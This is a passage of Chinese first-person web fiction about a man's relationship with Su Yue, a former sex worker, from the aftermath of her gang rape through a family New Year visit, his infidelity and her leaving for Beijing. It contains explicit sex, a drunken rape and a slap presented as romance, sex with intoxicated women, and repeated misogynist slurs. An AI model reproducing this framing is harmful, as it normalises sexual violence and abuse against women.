跟鸭子他们打了招呼，我便拦了辆出租车去城市之家。到了605门口，我按了门铃。房间里传来苏枂的声音：“谁？”我说：“废话，你说我是谁!”然后苏枂便来开门了。门开了，我直接迈进去，然后苏枂立马把门关上，然后抱着我，在我怀里狠狠地哭泣起来。我完全没反应过来，只得任由头发凌乱的苏枂抱着。哭了一会儿，我抬起苏枂的脸，发现苏枂脸上有些许伤痕。我问：“怎么了？怎么弄成这个样子？”苏枂看着我，又哭了。我们来到床边，床上很凌乱，我们坐在床上，我点了根烟问苏枂：“哭完了没有？跟我说说怎么了？”苏枂说：“你还不明白么？”我说：“不明白，你说。”苏枂说：“我遇见坏人了。他们‘那个’了我，然后抢走了我的东西。”我吸了口烟，看着苏枂，她不像是在撒谎。也许是我酒喝多了，我心中竟然有一种苏枂自作自受的感觉，我问道：“那你打电话给我干嘛？！”苏枂猛地抬头瞪着我，然后她又低下头去，低声说道：“我的手机也被抢了，我只记得你的号码……”然后我心软了下去，看着苏枂。我问道：“他们几个人？”苏枂说：“两个。”我说：“抢了你什么东西？”苏枂说：“都抢走了。”我说：“报警吧。”苏枂坚决地摇摇头。最后我又点了根烟，看着苏枂：“那你想怎么办？对了，你洗澡了没有？”苏枂摇摇头。我说：“既然你决意不报警，那你去洗澡吧，洗仔细点。”苏枂点点头，走进浴室。

其实就是有人约她去宾馆，本来应该是爽完了给钱，谁知她一进房间发现有两个人，就被LUN了，然后身上的钱和手机也被抢了。

世间一分一秒地走着，半个小时之后苏枂出来了，披着浴巾。苏枂走到我身边低着头坐着，我问道：“你的衣服还在吧？”苏枂说：“在。”我说：“你休息一会儿，然后穿好衣服我带你出去，买身新衣服，把旧的扔了，今晚去我家。”苏枂说：“衣服不用买了，我们现在去你家吧，我不想呆在这里了。”我说：“衣服要买。因为我看你这身衣服不爽。”苏枂看着我：“是因为我很脏吧？”我转过头抽着烟没说话。“你带我去医院吧。”最后，苏枂说。

过了会儿，苏枂穿好衣服，我们出了宾馆。然后我带苏枂去医院，苏枂检查了一下，所幸没什么大伤，然后医生给苏枂开了些药，我们回到家里。

回到家里，苏枂又去洗了个澡，我坐在沙发上抽烟。又过了半个小时，苏枂出来了。我看着苏枂，清纯的面容，美丽的眼睛，白皙的双腿，长长的头发，如果不曾亲眼见过，你很难想象如此漂亮清纯的女孩，在几个小时之前曾经那样的被人所凌辱。苏枂坐在我身边，我问她：“打算怎么办？”苏枂说：“不知道。”我说：“回家吧。”苏枂说：“不想回去。”我说：“你现在应该回到你父母身边。”苏枂说：“我父母6年前就去世了，车祸。”我说：“那你这几年怎么过的？”苏枂说：“跟我舅舅家一起。不过我舅舅舅妈不怎么喜欢我。”我吸了口烟：“那你不打算回你舅舅家了？快过年了。”苏枂说：“不想回去。不过也没地方去。”然后我很随意地开玩笑说道：“要不你跟我回家？跟我爸爸妈妈我们一起过年？”苏枂一听，坐直身子看着我：“真的么？你不嫌弃我？”我笑了：“这不是嫌弃不嫌弃的问题，如果你想的话，那就跟我一起回去，反正我家很大，够你住的。就当散散心”苏枂听了，靠在我肩膀：“谢谢你。”
从那之后我半个多月里，苏枂一直在我家住着。我上班时她在家睡觉，到中午时她做好饭菜等我回来。晚上吃完饭我们一起出去走走。然后回家一起看电视或者上网，但从不ZUO爱。有时苏枂睡觉时会搂着我，吻我，但是我却总是没性趣。我也不知是否与1月11号那晚的事有关。甚至有时苏枂都骑到我身上了，我还是把她推下身，只听见苏枂的叹息。就这样，日子一天一天过去，很快就是新年了，我们要回家了。

回家之前，和鸭子他们又聚了一次，苏枂跟我一起。我们走进包厢时，所有人都用奇怪的眼神看着我俩。吃饭时鸭子在我耳边说：“那个BIAO子被轮了那件事知道了吧？”我喝了口酒，点点头。鸭子说：“是不是你带人做的？！哈哈！”我看了鸭子一眼，说：“废话，怎么可能！”鸭子说：“那你现在对她这么好，你又不亏欠她什么！”我说：“我知道。”然后鸭子说道：“最后提醒你一句啊！玩玩就得了，免费打几个福利PAO，别当真。否则你就等着后悔吧。”我说我知道了，来喝酒！接着跟鸭子炸了一杯。

那晚喝多了，站都站不稳，苏枂一直扶着我回家。到家后苏枂帮我脱了衣服扶到床上，然后用热毛巾给我擦洗了一下。最后苏枂准备转身去浴室时，我拉住了她的手，她倒在我身上，我起身将她摔在床上，撕开她的衣服，然后像个QJ犯一样将她压在身下。苏枂一直在挣扎，这让原本就喝多酒的我火了，我起身拿出钱包取出几百块一把扫在她脸上：“你TM装什么纯洁？！老子给你钱！臭ＢＩＡＯ子！”然后苏枂沉默了，什么话也没说，任由我在她身上探取我想要的快感。最后很长时间，我在苏枂轻声的哭泣里发射了，那种感觉毕生难忘。

第二天我醒来，苏枂不见了，我找不到她。最后我在床上抽了根烟，然后起身去情人湾。下了车，远远就看见苏枂站在栏杆前，雪白色的羽绒服，长长的头发随风飘扬，很美，很美。我走到她身边，她转过身看着我，眼中带着怨恨。我低下头，牵起她的手，她没有挣脱。然后我牵着她的手来到棉花糖小商铺，给她买了一个大大的棉花糖，她看着棉花糖，一声不出，表情冷漠。最后我说：“回家。”苏枂就那样拿着大大的棉花糖，任由我牵着手回家。

我打电话给妈妈，告诉她明天回家，我朋友也跟我一起回去。妈妈说：“你朋友？男孩女孩？”我说：“女孩。”妈妈说：“那你问她喜欢吃什么？我明天做给她吃。”我说：“什么都行。”

第二天，我们登上火车回家。火车上，我在吸烟区抽烟时，苏枂突然问我：“要不我不去了，好不好？”我说：“怎么了？”苏枂说：“不想去了。”我说：“为什么？”苏枂说：“因为你说过，我就是一个臭BIAO子。你爸爸妈妈回希望一个臭BIAO子去你家过年吗？！”我哑然，苏枂低下头。最后我牵起她的手：“别乱想了。”我看见苏枂悄悄地哭了。
终于回到家乡，下了车，苏枂叫我带他去商场。我带她去了。我以为她要买件新衣服，谁知她给我爸妈买了两件保暖内衣。我说你不必这样的。苏枂说：“第一次去你家，两手空空的不好吧？再说了，这衣服，不脏。”

回到家，刚一进门，便发现家里全是人，七大姑八大姨都来了，看见这样的阵势，苏枂脸刷的一下红了，然后我就开始介绍，全部介绍完之后，苏枂把保暖内衣送给我妈妈。我妈妈很高兴，拉着苏枂的手，坐在沙发前削苹果给她吃。然后我的七大姑八大姨全部围了过去，七嘴八舌地跟苏枂聊着。从今年多大了聊到毕业之后准备去哪，从家里几口人聊到了以后想多大生孩子。看着这样的场景，我心里在想：如果家里人知道苏枂其实是个BIAO子，他们的脸上会是什么样的表情。不过苏枂此时的表现看起来很可爱，脸红着，结结巴巴地回答着这样那样的问题。直到吃饭了，我妈才想起来问苏枂：“渴了吧？进家里到现在都没喝水！”

吃饭的时候，家里人显得很高兴，也许他们对苏枂很满意，不停地给苏枂夹菜，苏枂就在不停的吃。吃完饭家里人开始打牌，摆了四桌，有玩扑克的，有打麻将的。我坐在沙发上看电视，苏枂坐在我身边。苏枂对我说：“知道么？今天来你家，让我想起我爸爸妈妈没死的时候，那时我家也像你家这样热闹。”我正准备说什么，苏枂起身给我妈妈倒水去了。

我看着苏枂，她坐在我妈妈旁边看我妈妈打牌，看起来我妈妈挺喜欢她。妈妈说：“闺女喜欢吃什么？等阿姨今天赢了钱给你买！”苏枂说：“阿姨买的我都喜欢吃，阿姨今天红光满面，一定能赢钱，要准备一个大点的钱包，不然钱太多了装不下。”苏枂的一番话把我家里人逗得哈哈大笑。我看着这样的情景，点了根烟，想着：苏枂啊苏枂，你为什么以前是一个BIAO子呢？

晚上吃完饭，我和苏枂出门散散步。一出小区，苏枂立马回复了那种淡淡的冷漠。我们一路无话。最后我抽烟时，苏枂问我：“是不是很后悔带我回你家？”我说：“怎么这样说？”苏枂说：“因为我后悔来你家了。”我问道：“为什么呢？”苏枂说：“你家里人好好，我喜欢你们家，可是你知道我的情况的，我配不上。我是一个臭BIAO……”苏枂还没说完，我一把拥过她，吻了她。苏枂紧紧地抱着我，哭了。

回到家，见我们回来了，我妈迎上前，问苏枂冷不冷，苏枂说不冷，我妈说：“闺女你明天陪我上街买年货。”苏枂说：“好啊，阿姨喜欢吃什么？我给阿姨买。”我妈笑了起来，摸摸苏枂的头，说道：“是我给你买。”
晚上睡觉时，苏枂和我睡一屋，关上门，我们进了被窝，苏枂紧紧地搂着我。黑暗中，苏枂问我：“你还没回答我的问题呢，后不后悔？”我说：“我从不后悔，只是对一些发生过的事情表示遗憾。”苏枂又问我：“我这样抱着你，你会不会觉得我很脏？”我说：“没有，我觉得挺好。”
第二天我睡到快中午，起床时看见苏枂和我妈妈一起在做饭。吃了饭，苏枂陪我妈上街买年货去了，爸爸去打牌。我打开电脑玩实况。中间QQ闪了很多次，很多朋友都陆续回来了，在群里说好改天聚一聚。四点多钟的时候，我妈和苏枂回来了。我妈拎了一个大袋子，苏枂拎了两个大袋子和一个大纸盒，打开一看，都是吃的，还有我妈给苏枂买的风衣和苏枂给我爸妈买的脚部按摩器。然后她们坐在沙发上休息，我给她们端水。我妈说：“闺女，再试试衣服吧！”苏枂说：“好的。”然后苏枂穿上风衣，显得很漂亮，身材凸现出来。我妈很满意。苏枂说：“阿姨。我就说你眼光好！你也试试我给您和叔叔买的按摩器吧。”然后苏枂拆去按摩器的包装，倒上水，试了试水温，把按摩器拎到我妈身前，给我妈泡脚按摩。大概这个按摩器真的挺舒服，我妈一直在夸苏枂，苏枂脸红了。最后。苏枂从袋子里拿出一件衣服给我，说：“这是我买给你的，阿姨帮我参考的，你试试吧。”是一件羽绒服。我穿上后，苏枂说挺好看。

晚上吃完饭，我带苏枂出去玩。路上的时候，苏枂说：“阿姨人好好。”我说：“恩，我妈挺不错的，看得出来她挺喜欢你。”苏枂说：“所以我觉得好对不起她。”我说：“别说了。”然后我带苏枂去吃羊肉串，打游戏机，逛街。最后我们在奶茶店喝奶茶。苏枂眼睛看着桌子上的奶茶，幽幽的说道：“我什么时候走？”我说：“这不废话么！当然是过完年最后和我一起走。”苏枂说：“现在在你心里我是一个什么样的人？”我说：“应该是一个过去不堪，未来美好的女孩。请原谅我这样说。”苏枂看着我：“未来美好？因为有了你？”我说：“并不一定是因为有了我，我觉得每个人的未来都应该是美好的。”苏枂笑了一下，问我：“那你喜欢和我在一起么？”我说：“挺好。”苏枂问我：“那你会喜欢我爱我么？”这个问题让我很难回答。我喜欢苏枂么？我自己也不知道。正当我犹豫时，苏枂说道：“不管你的答案是什么，你不可能娶一个臭BIAO子。所以你原本不应该带我来你家。”

过年了。大年三十，苏枂和我跟着爸爸妈妈去奶奶家过年，我们整个家族都聚在一起，很热闹。在奶奶家，我和几个叔叔打麻将，而苏枂和我妈妈还有姑妈她们包饺子做胡辣汤，她看起来就像个小媳妇儿。年夜饭时，我和苏枂一起敬酒，奶奶很高兴，说：“我的孙媳妇儿真漂亮！”给姑妈敬酒时，姑妈问我：“你们准备什么时候办事啊？”我愣了一下，看着苏枂，苏枂脸红了，在姑妈的追问下，苏枂说：“我随他。”我说：“苏枂还有一年大学毕业，到时候再说吧。”苏枂却看着我妈妈，问道：“阿姨，我还想考研，可以么？”我妈妈说：“当然可以啊，女孩子好学是好事。”
吃完年夜饭，我和苏枂一起给长辈磕头，每个长辈都给我们压岁钱。我把我的压岁钱全给了苏枂，叫她帮我保管。然后家里人又开始打麻将打牌，苏枂坐在我妈妈旁边，一边看着我妈妈打牌，一边给家里的长辈们端茶倒水。那晚我妈妈赢了好多，把赢的钱全给了苏枂。

下半夜时，我带苏枂出去压马路。因为是除夕夜，大街上很冷清，偶尔有烟花爆竹的声响，却使这个夜晚显得更加安静。我牵着苏枂的手，我们都穿着新衣服。一路上我们都没怎么说话。最后我们来到一个路口，苏枂拉了拉我的手，对我说：“你同意么？”我说：“什么同意？”苏枂说：“我想先考研。”我说：“这是你的自由啊。”苏枂说：“呵呵，我的自由。跟你无关么？”

我没说话。然后苏枂说：“说出你的态度吧，趁我还没反悔之前。”我说：“什么态度？”苏枂说：“我考研，然后毕业了回到这里和你在一起，好不好？”我点了根烟，说：“可以，只不过有件事你必须答应我。”苏枂说：“什么事？”我说：“过去的终究过去了，从现在开始，我不想我们俩之间出现‘BIAO子’这两个字。”苏枂看着我，眼神中仿佛添了一抹亮丽的色彩，然后她点点头，拥抱住我。“再也不会了。”在我的怀里，苏枂柔声的说道。

那个春节我过得很快乐，因为多了个苏枂。在家里时，苏枂陪我妈做饭，看我妈打牌。出去玩时，苏枂很听话，很温柔，也很体贴人。有时ZUO爱时，苏枂也让我身心舒畅，并且用的是和以前不一样的方式：她开始每次都深深的吻我，然后注视着我的眼睛，然后将自己全部交给我。不过，苏枂从来没说过她爱我。

春节假期终于过完了，我和苏枂该回去了。临走时，我妈给苏买了很多好吃的，又给她买了衣服。而苏枂也给我妈买了一副银手镯，给我爸买了一个玉貔貅。走的时候我爸妈把我们送上了火车，嘱咐道：“有时间你们就一起回来。”火车开动时，我看见苏枂好像哭了。苏枂擦了擦眼睛，对我笑了一下，说道：“叔叔阿姨人真好，你真幸福。”我说：“每个人都应该是幸福的。”

刚回到家，手机响了，是鸭子：“JIAN货~我听说那个BIAO子过年去你家了？！你真猛！我TM真佩服你！人家包夜你包年！”我面无表情：“她现在不是以前了。”鸭子停了一会儿，说：“晚上有没有空？出来，有话跟你说。”我说：“好，能带她去么？”鸭子说：“当然不能！”挂了电话，苏枂问我累么？我说不累。苏枂说：“我以后住在这里可以么？每个月房租我们对半付。”我说：“你住在这里当然可以，房租的事你不用操心。”然后我对苏枂说：“鸭子晚上喊我一起聚聚，你去不去？”苏枂说：“不去了，坐了一天车，累了，晚上我在家自己弄点吃，你去吧，别喝太多酒，回来早点。”我说：“好。

晚上，我在饭店见到鸭子，他也一个人。我们进了包厢，点了几样菜，开了瓶酒。一坐下来鸭子就一直盯着我看。我也没说话。最后鸭子叹了口气：“唉！兄弟！你陷进去了！”我笑了笑，问道：“晚上想跟我说什么事？说吧。”鸭子说：“还是那句话，玩玩可以，不要动心。”我说：“我知道。”鸭子说：“你真的知道么？！你要是知道就不会带她回家了。”我说：“也许吧。”鸭子说：“兄弟，听我说，那个女人是BIAO子，你用不着这样的。你可以同情她，多光顾她几次，但是不能爱上她，更不能跟她结婚，把这辈子都搭进去！”我说：“可是每个人都不想走错路的，既然可以回头，为什么非要执着过去？”

鸭子点了根烟，笑着盯着我：“你也知道她走错路了，她一天是BIAO子，一辈子就是BIAO子！你怎么就那么肯定能够她以后能从良？即使她从良了，以后当你结婚了，每当你以丈夫的身份跟她上CHUANG，你敢说你就不会想起以前她跟那么多男人上过CHUANG？！她的嘴巴可爱吧？那么红润那么小巧！但是就是这张可爱的嘴巴，曾经含过那么多男人的J8！”看着鸭子的笑容，我也在笑，只不过我的笑容，渐渐僵硬了。

鸭子吸了口烟看着我：“好好考虑吧。我当你是兄弟，才冒着撕破脸的危险跟你说这些话，因为我看得出来你心里已经有她了。为了个BIAO子，放弃自己的生活，放弃其他那么多的女人，值得么？”我看着鸭子：“兄弟，不管我和苏枂结局如果，以后别再说她BIAO子了。我不喜欢听。”

那晚我们喝了很多酒，回到家时，苏枂在等我。她帮我放好水，然后带我洗澡。我看着她，心里回想着今晚鸭子对我说的话，觉得头都要炸了。我宁愿从未认识她。但是现在已经很难放下她了。苏枂看出了我的变化，吻了我一口：“心里有话就说出来吧。”我说：“没有。只是喝醉了，难受而已。”苏枂笑着看着我，带着怜惜的眼神：“睡一觉吧，睡着了就什么都忘了，那些不愿意面对的事实和让你恶心的东西都会消失，等你一觉醒来，又是新的一天。”我当然听出了苏枂话里有话，拉着苏枂的手，说道：“少跟我扯这些废话，陪我睡觉，我们都别乱想。”

黑暗中，我抱着苏枂，睡不着，眼睛看着窗外的漆黑一片。苏枂啊苏枂，我该拿你怎么办。

从那以后，苏枂和我住在一起。不知道苏枂过去的人都认为我找到了一个漂亮清纯的女朋友，都觉得我艳福不浅。但是知道苏枂过去的人，都在背地里冷笑着，等待着看我和苏枂的笑话。

有一天下午，鸭子打电话给我，说晚上聚聚，别带女人，全是兄弟们。我说好。然后我给苏枂打电话，告诉她晚上自己吃。然后晚上我和鸭子碰面了。碰面之后才发现鸭子身边做了两个女孩，都挺漂亮。我问鸭子：“不是说全是弟兄们么？”鸭子说：“那是我怕你乱带人过来煞风景扫兴！”然后鸭子起身附到我耳边说：“很久没换口味了吧？这两个女孩都是大学生，今晚咱兄弟俩开个荤！”我没说话。坐下之后，鸭子向那两个女孩介绍我：“这是我兄弟，人很不错，很仗义，也很有爱心，专门喜欢收养一些流浪的玩意儿！今晚大家要玩得痛快！”我知道鸭子在开玩笑，也没计较。
那晚我们一直在喝酒，我们从饭店喝到KTV又喝到了宾馆。中间苏枂打了一次电话给我说先睡了，叫我别喝醉了注意安全。最后在宾馆里，我们玩猜拳，输的喝酒。不一会儿酒喝完了，两个女孩喝的最多。

我们还不尽兴，接着玩猜拳，输的脱衣服。最后两个女孩的衣服被我和鸭子折腾光了。眼见如此，鸭子朝我使了个眼色，当时我喝多了，也没管那么多，指了个个子高的女孩，说：“我们单独玩。”然后鸭子带着另一个女孩到旁边房间了。鸭子走后，我二话没说脱了衣服，然后便上了战场。在我的层层冲击下，女孩面色CHAO红，不住地呻吟，最后我SHE了，正当我意犹未尽时，有人敲门。

我下床开门，是鸭子。鸭子问我：“搞定了没？”我说：“废话。”鸭子说：“戴TAO了没？”我说：“没啊！你不是说她们是学生么？怕个毛！”鸭子说：“我不是这个意思，可是你不戴TAO，待会儿我怎么弄她？！”我说：“你刚才戴TAO了？”鸭子说：“废话！我可不像你这么自私！”我笑了：“那你叫她洗洗吧！”然后我和鸭子换了房间。

换了房间，我进门之后，那个女孩在洗澡，我光着身子直接进去了，和她搂在一起。女孩子故作害羞地娇嗔：“你们两个真会玩！”我心想：“你们这两个女孩也不赖！比BIAO子还BIAO子！”然后我们一起洗了澡，上CHUANG之后我吸了根烟，就又开始了。刚才第一个女孩个子很高，很有骨感。而这个女孩却很有肉感，两个NAI子握起来真舒服，还有她的小蛮腰。女孩子一边喘息一边对我说：“你下面的比鸭子长多了，还那么粗！”我YIN笑着，说道：“今晚…我、我TMCAO不死你！”结束时，女孩浑身颤抖，仿佛一直处在GAO潮之中。我去洗了个澡，然后躺在床上。忽然我想起一件事，然后我下床特地看了看门牌——城市之家605。回到床上，我闭上眼睛，脑海里浮现出苏枂的脸。酒一下子醒了，然后我起床穿好衣服，不顾女孩要第二次的挽留，出了宾馆，回家。

回到家里，夜已经深了。苏枂睡在床上，已经睡熟。我坐在床边看着熟睡中的苏枂，点了根烟。柔和的灯光，静谧的夜晚，美丽的苏枂，此刻我觉得我才是那个无比肮脏的人。我又去洗了个澡，回到床边时苏枂醒了，问我怎么这么晚才回来。我说：“玩呢。”然后苏枂一直看着我，她的脸上逐渐露出笑容，那么温馨。然后她起身拥抱住我，吻了我，接着轻轻地吻了我左边的脖子，对我说：“如果有一天，你能只属于我一个人，那该有多好！”
第二天上班，同事看到我，坏笑了起来，然后贼兮兮地问我：“昨晚很疯狂吧？！”我说：“哪有！别乱说！”然后同事拍了拍我肩膀：“大家都知道的~！你看你脖子上的草莓，那么深~吻你的这个女孩一定爱你爱的要死吧！”我愣了一下，随即去洗手间。镜子里，我看见我左边脖子上那片深深的吻痕。昨晚最后苏枂吻了我脖子，但是吻得很轻很轻，难道是回家之前弄得？！我突然明白了昨晚最后苏枂那句话的深意了。她看着我脖子上别的女人留下的痕迹，那么温柔的对我说：“如果有一天，你能只属于我一个人，那该有多好！”

下班回家的路上，我魂不守舍，我以为苏枂会离我而去了，我不敢打电话给她，不敢面对那残忍的结果。我知道我必须为我的放荡付出代价，但是我已经后悔了。回到家，开门进屋，我甚至不敢看。我以为屋子里会空空如也，但是我却看见苏枂正在餐桌上仔细地布置晚餐。见我回来了，苏枂对我笑了一下，上前接过我的公文包，然后对我说：“下班了？辛苦了！吃饭吧！”我们坐在桌前，桌子上是苏枂做的饭菜，都是我喜欢吃的。苏枂还准备了啤酒。坐下之后，苏枂对我说：“这是我做的饭菜，尝尝合不合口味。”我心想：“这是最后的晚餐么？抑或是最后的温柔？”

我们打开啤酒，一边喝一边吃菜。苏枂为我夹了很多菜，我吃的不亦乐乎。然后苏枂举杯：“今晚的这顿晚餐，也许是开始，也许是结束。我知道，比我好的女人有不少，但是没我好的女人也不少。我希望你是我男人，希望你在晚餐结束之前告诉我你的答案。事先声明：决定的就不许后悔，你也不要让自己后悔。”我听了，就像得了恩赦一般，看着苏枂。苏枂却说：“不要这样看着我，你是那么骄傲的一个人，不要在一个曾经是BIAO子的女人面前低下头。”
我们吃着喝着，两个人喝了10瓶啤酒，最后我醉了。苏枂收拾好桌子，拉着我走到床边。我看着苏枂，多么美好啊！完美的夜晚，完美的气氛，完美的苏枂，完美的开始。苏枂问我：“考虑好了么？”我没说话，只是说：“烟……”苏枂帮我拿来烟，点燃之后给我，我抽了口烟，看着天花板。我在想：“今晚是否是决定我下半生的一个重要的夜晚？我会和苏枂厮守一生么？”但是所有的疑惑与动摇，在我看见苏枂的那一瞬间都泯灭了。苏枂低着头，拉着我的手，对我说：“我还想你带我去情人湾呢。我还想你为我买大大的棉花糖。你会么？”我看着苏枂，想哭，但是哭不出来。我为什么哭？不是为我自己，是为了苏枂。这么好的女孩，为什么我不珍惜？！就算她以前是个BIAO子，但是她以后会是我的唯一！我看着苏枂，认真地说道：“苏枂，愿意嫁给我么？”

苏枂听了，惨然地笑了，摇摇头。我愣住了，这是什么意思？苏枂看着我，说道：“嫁给你？你会娶一个BIAO子么？”我看着苏枂，说道：“不要再提那两个字。我不知道谁是BIAO子，我只知道我爱上了苏枂。”苏枂又笑着摇摇头，哭了。我搂住苏枂，她哭得越来越大声，我只能紧紧地拥住她。最后她挣脱开，含着眼泪问我：“我是个BIAO子啊！你说娶我只是让我开心！有意义么？”我凝视着哭泣的苏枂，对她说：“过去的终究过去了，我只希望未来是美好的。你也看见了，我爸妈还有我家里人多么喜欢你，我也这么爱你，你会拒绝我么？！你拒绝给我看看！现在就拒绝！”苏枂不说话。我吻了苏枂一口，对她说：“你以前走错路，是我不对，如果我早点遇见你，你就不会那样。对不起宝贝。现在请给我一个机会，让我好好对你！”苏枂惨笑着，摇摇头：“你何必这么违心地卑躬屈膝？”我楞住了，问苏枂：“你是在拒绝我么？”

苏枂看着我，然后低下头，幽幽地问我：“你昨晚干什么去了……”我哑然。苏枂说：“你的脖子疼么？她吻得这么用力！”我不说话。苏枂说：“昨晚是别的女人占有我的你！是么？！”我看着苏枂，已经没有解释的意义了。最后苏枂说：“你还会再找别的女人么？”我说：“不会了。”苏枂说：“呵呵，你怕我了。你怕我离开你。你爱上我了。”我没来由笑了一下，说：“是。”苏枂搂住我，抚摸着我的面庞，说道：“你认为我会离开你么？”我看着苏枂的眼睛：“不会！”苏枂笑了，笑得我感觉好陌生，笑得我不知所措。最后苏枂收起笑容：“你昨晚扎扎实实地背叛我了！你应该知道，我是个BIAO子，你会背叛我，我就不会重操旧业？！”我看着苏枂，不知说什么。苏枂说道：“想象一下我被那么多男人压在身下的情形，将来这些情形还会有！因为……我就是个BIAO子！”我听了心里一紧，我再也控制不住我自己，一个巴掌，干净利落，苏枂的嘴角被我扇出了血。这是我这辈子唯一一次打女人。我打的是一个我深爱的女人，她曾经是个BIAO子。

我靠在床边，苏枂坐在床边，我们却没有贴在一起。苏枂没有哭，只是平静地看着我。我也看着苏枂。良久，苏枂说道：“很过瘾么？你终于以男人特有的方式给了我一巴掌。”我不说话，表情冷峻。苏枂接着说道：“现在你会怎么做？让我这个肮脏的女人滚出你的房间？”我还是没有说话，只是抽着烟。最后苏枂说：“你永远都不会接受我，你的爱和你的棉花糖一样，看起来很美，其实只是骗人的把戏！”我终于开口了，我吸了口烟，缓缓说道：“苏枂，我向你道歉，刚才我失去理智给了你一巴掌。但是，你不会理解，现在我的心有多疼。这种疼痛不是因为你伤害我，而是因为我打了我心爱的你。你不相信我的爱，你不接受我的爱，我不怪你。我只能跟你说：我很爱你，我希望娶你，我希望以后每晚入睡前，都是你温馨的面容。也许，哀莫大于心不死。但是这要你还在我身边，我的心就从此就是你的。我只能说这些。以后的路，你自己选择吧。”苏枂听了，一句话不说，上来搂住我，问我：“你刚才说的一切都是真的么？以后你只属于我一个人，好不好？”我说：“只要你不走。”苏枂又哭了：“你在这里，我能去哪？”
苏枂狠狠地吻着我，我抚摸着苏枂的脸颊。我问苏枂：“脸还疼么？”苏枂说：“疼。但是心不疼了。”然后苏枂褪下我的衣服，也脱去自己的衣服，和我一起走进浴室。直到许多年后的今天，我仍然能想起那晚我和苏枂的疯狂。我们从浴室做到了床上，又从床上做到了餐厅，然后从餐厅又做回床上。最后我射的时候，苏枂紧紧地搂住我，咬我，吻我的脖子。当一切归于平静，苏枂说：“其实今晚我已经准备好离开了。”我说：“那你最后为什么不离开呢？”苏枂坏笑着，用手紧紧握住我的JJ，说：“因为你说过我就是个BIAO子，从今往后，我只做你一个人的BIAO子。”

从那以后，我和苏枂的生活很平淡，但是带着幸福的色彩。时间一天一天过去，又是秋天。苏枂开始真正忙起来，她要考研。每天晚上，我看电视或是玩电脑，她总是坐在书桌前看书。每次我看着她，心里总有一种说不出来的不舒服，最后我想清楚了，我不舒服，因为我不想让她考研，不想让她离开我身边，不想我们俩两地分隔。终于，有天晚上，我试着和苏枂探讨这个问题。我说：“苏枂，你觉得考研很好很重要么？”苏枂说：“当然！”我说：“可是如果你考研走了，我们至少要两地分隔两年啊！”苏枂说：“我知道，但是我必须考研。”我说：“为什么？”苏枂说：“因为想给自己一个新的身份新的外衣。”苏枂的话让我听不明白，我只好如实跟苏枂说：“我不想你考研，不想两地分隔。”苏枂说：“为什么？”我说：“因为我想早点和你结婚。”苏枂却说：“亲爱的，结婚没有考研重要。我们以后随时都可以结婚，但是考研我只有这一两年机会。”我不知再说什么了，于是便只好作罢，但是心里仍然不爽。

时间流逝，转眼到考研的时候了。那几天我在单位忙一个会议，苏枂自己去考试。然后又过了一段时间，那天我回家，苏枂上来就吻我一口：“我考取了！”我立马问道：“在哪？”苏枂说：“北京！”我看着苏枂，她是那样的高兴，以至于没有看见我的变化。我问她：“什么时候去上学？”苏枂兴高采烈地说：“很快！”然后我独自进了卧室。

距离苏枂去北京一天一天近了，我也一天一天不安起来。苏枂却越来越兴奋。最终，苏枂离开的日子还是到来了。那晚我们做AI做了一夜，我直到最后还在试图说服她别去北京，但是都没有用。第二天我送她上火车，她对我说：“好好照顾自己，等我回来！”我笑了笑，说道：“珍重。”

回到家里，看着空荡荡的屋子，那种滋味很难受。我坐在沙发上，喝着啤酒。看着窗外的蓝天，回想着和苏枂从认识到今天，不胜唏嘘。这时手机响了，是鸭子：“你的女神走了？今晚出来聚聚！好久没出来了！”我说：“不想去。”鸭子说：“少TM跟我装痴情！”我说：“我只是心情不好。”鸭子说：“那就更要出来了！”于是我答应了。下午苏枂给我信息，说到了。我没回。晚上和鸭子碰面，一群朋友。我们喝酒，我没说太多话。喝完酒我就回家了。一个人躺在床上，心里感觉很不好。想起每晚苏枂都是搂着我睡去，可是现在我竟也一个人在这里独眠。最后我受不了了，只得打电话给苏枂：“喂，你在干嘛呢？”苏枂显得很兴奋：“我在学校里逛呢！学校好大啊！”我说：“晚上吃的什么？”苏枂说：“随便吃的。先不说了，我们去多媒体教室了！”挂了电话，我怅然若失。点了根香烟，我望着窗外。窗外的月亮很大很圆，也很冷寂。我打开电视，没什么好看的。我打开电脑，没什么好玩的。最后我打电话给鸭子：“出来！陪老子喝酒！”

那晚我和鸭子喝了很多，鸭子也说了很多，也不知是废话还是良言。鸭子说：“你看！你SB了吧！那个BIAO子有了新的平台就离你而去了！现在你居然深更半夜喊我出来陪你喝酒！”我没说话，一杯酒下肚。鸭子又说：“现在回头也不晚，就当是免费打了一年的福利炮！现在你的新生活又开始了！”我还是没说话，两杯酒下肚。鸭子还说：“说你SB你还真SB！跟BIAO子玩感情！玩不死你！”我瞪着鸭子，第三杯酒下肚，我一把摔了酒杯。鸭子被我的眼神和狠劲吓了一跳，然后他往后坐坐，继续说：“今晚别喝得烂醉如泥，马上我找两个大学生出来，咱哥俩一切照旧！”我一下子站了起来，抓住鸭子的衣领，一字一句对他说：“我很想苏枂，你别再说她是BIAO子了！要不然真的翻脸！你也见识过我翻脸的时候是什么样子！”鸭子赶忙说：“好好好！你厉害！喝完酒我送你回家！然后我自己去搞NV人！行了吧！”

苍白的日子，无趣的生活，孤独的流光，缓慢的时间。一个人的时候，每当我打电话或者发信息给苏枂，她总是说忙，或者说导师在不方便。每次我都一个人呆在家里。最后我终于受够了，我要去北京找苏枂。第二天我登上了开往北京的火车。经过12个小时的颠簸，我到了我们伟大的首都。下了火车我就径直赶往苏枂的学校。到了校门口，我打电话给苏枂：“宝贝在干嘛呢？我想你了。”苏枂用懒洋洋的声音说道：“昨晚做实验累死了，现在在补觉……”我说：“那我现在来陪你好不好？”苏枂说：“哈哈！好啊！你过来！”我说：“我要是过来怎么办呢？”苏枂说：“我现在就和你领结婚证！”我笑了，说道：“那你跟我说你在哪个宿舍楼。”苏枂说：“6栋~你来啊~~~”我说：“好，十五分钟之后，你在楼下等我。”

